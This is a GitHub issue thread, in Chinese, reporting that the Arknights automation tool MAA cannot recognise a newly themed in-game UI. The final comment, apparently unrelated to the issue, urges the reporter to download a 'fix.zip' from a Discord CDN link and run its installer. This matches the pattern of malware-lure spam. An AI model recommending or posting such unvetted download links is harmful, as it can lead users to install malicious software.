### ISSUE TITLE
迷宫饭UI无法识别

### ISSUE THREAD

**Issue by MonEclair-bit** [MaaAssistantArknights/MaaAssistantArknights#10438]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

迷宫饭更新了UI主题，MAA无法识别，无法进行任务，更换UI之后可以正常进行

### Version

UI Version: v5.5.11452

### 日志和配置文件

[asst.log](https://github.com/user-attachments/files/16844256/asst.log)
[gui.log](https://github.com/user
[gui.json](https://github.com/user-attachments/files/16844261/gui.json)
-attachments/files/16844258/gui.log)

### 配置信息

win11

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
